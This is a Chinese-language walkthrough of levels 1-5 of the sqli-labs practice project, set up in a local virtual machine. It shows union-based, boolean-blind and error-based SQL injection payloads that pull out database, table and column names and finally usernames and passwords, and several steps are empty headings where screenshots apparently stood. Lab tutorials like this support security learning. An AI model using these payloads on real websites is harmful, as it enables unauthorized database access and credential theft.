生命在于折腾——SQL注入的实操（一）less1-5

一、实操环境

1、操作系统

1. VMware虚拟机创建的win10系统
2. 内存8GB
3. 硬盘255GB
4. 处理器AMD Ryzen 9 5900HX

2、操作项目

sql-lib项目，本篇文章介绍关卡1-5。

3、工具版本

5. phpstudy 8.1.1.3
6. php版本 5.4.45nts
7. Apache2.4.39
8. MySQL5.7.26
9. Chrome

4、SQL注入目的

1. 判断是否允许注入
2. 判断注入点类型
3. 判断回显点
4. 获取数据库信息
5. 获取表信息
6. 获取字段信息

二、less-1

1. 判断注入类型

首先输入?id=1。

输入?id=1’

输入?id=1’ --+，语句正常，输入?id=1 and 1=1以及?id=1 and 1=2都正常，说明是单引号字符型注入。
2. 判断字段数。
输入?id=1’ order by 3–+，正常显示，输入?id=1’ order by 4–+，报错，所以有三列数据。

3. 获取回显点
   输入?id=796（这里是不存在的id）’ union select 1,2,3 --+ ，这里正常显示，所以有三列数据，有两个显示位。
   

4. 获取数据库信息
   （1）获取数据库名长度
   输入id=1’ and length(database())=8（这里是猜测，可以换）–+，如果正确，则会正常显示，如果错误，则会返回空，这里可以知道数据库的名字长度为8。
   

（2）获取数据库名
输入?id=1’ and ascii(substr(database(),1,1))=115（这个是ascii码，可以换）–+，如果正确，则会正常显示，如果错误，则会返回空，根据上一条获取的数据库名字长度，对substr截取的位置进行更改，可以查询到完整的数据库名字，这里的数据库名字为security。

6. 获取表信息
   （1）首先获取表名长度。
   输入?id=1’ and length((select table_name from information_schema.tables where table_schema=‘security’ limit 0,1))=6–+。（这里是从security库中截取第一个表，并判断该表的名字长度，如果符合上面填的6，则返回正常，否则返回空）
   
   （2）获取表名。
   和数据库名字一样，可以用ascii码判断，也可以直接用等于判断，这里输入?id=1’ and ascii(substr((select table_name from information_schema.tables where table_schema=‘security’ limit 0,1),1,1))=101–+。最后匹配完成全字符第一个表是emails。
   

7. 获取字段信息
   这里输入?id=1’ and ascii(substr((select column_name from information_schema.columns where table_schema=‘security’ and table_name=‘users’ limit 0,1),1,1))=105–+。==这里查询的是security库中，users表中的第一个字段的对应ascii码是否为105，如果是，则返回正常，否则返回为空。
   
   最后可以输入?id=-1’ union select 1,2,group_concat(concat_ws(‘~’,username,password)) from security.users --+。来获取到详细信息。
   

三、less-2

1. 判断注入类型
   输入?id=1 and 1=1–+返回正常，输入?id=1 and 1=2–+返回为空，所以判断为数字型注入。

2. 判断回显点
   
   发现这个表有三列。

3. 获取数据库信息
   和第一关一样，但要注意把?id=1后面的单引号去掉，因为本关是数字型注入。

4. 获取表信息
   和第一关一样，但要注意把?id=1后面的单引号去掉，因为本关是数字型注入。

5. 获取字段信息
   和第一关一样，但要注意把?id=1后面的单引号去掉，因为本关是数字型注入。

四、less-3

1. 判断注入类型
   输入?id=1 正常显示，输入?id=1’ 报错。
   
   从报错信息可用发现1被（‘’）包裹，所以只需要将’)注释掉即可，输入?id=1’)–+。返回正常。
   

2. 判断回显点
   输入?id=1’) order by 3–+，正常显示，输入4报错。

3. 获取数据库信息
   获取数据库名字长度。
   

获取数据库名字。

5. 获取表信息
   获取表名长度。
   
   获取表名。
   

6. 获取字段信息
   
   

五、less-4

1. 判断注入类型
   输入?id=1，可以发现1被（“”）包裹，所以我们只需要将”）注释掉即可，这里输入?id=1")–+即可。
   

2. 判断回显点
   

3. 获取数据库信息
   库名长度。
   库名。
   

4. 获取表信息
   获取表长度。
   
   获取表名。
   

5. 获取字段信息
   这里的table_name可以去掉了。

六、less-5

1. 判断注入类型
   首先输入?id=1，发现显示You are in…，如果输入?id=1’，则会报错，所以我们先将’注释掉。
   

2. 判断回显点
   

3. 获取数据库信息
   可以获取到数据库名长度
   
   也可以根据判断，猜出数据库名。
   

4. 获取表信息
   表名长度。
   
   表名。
   

5. 获取字段信息
   
   但是在让其打印全部信息时出现了问题，因为他只会返回You are in…。这里我们可以使用?id=-1’ union select count(*),1,concat(‘~’,(select concat_ws(‘[’,password,username) from users limit 0,1),‘~’,floor(rand()*2)) as a from information_schema.tables group by a–+。让其将我们要查找的信息在报错信息中返回。
   

七、总结与小计

以上是sql-lib的1-5关关卡，需要有一定mysql基础和计算机思维能力，如果有什么错误请大家在评论区留言，感谢。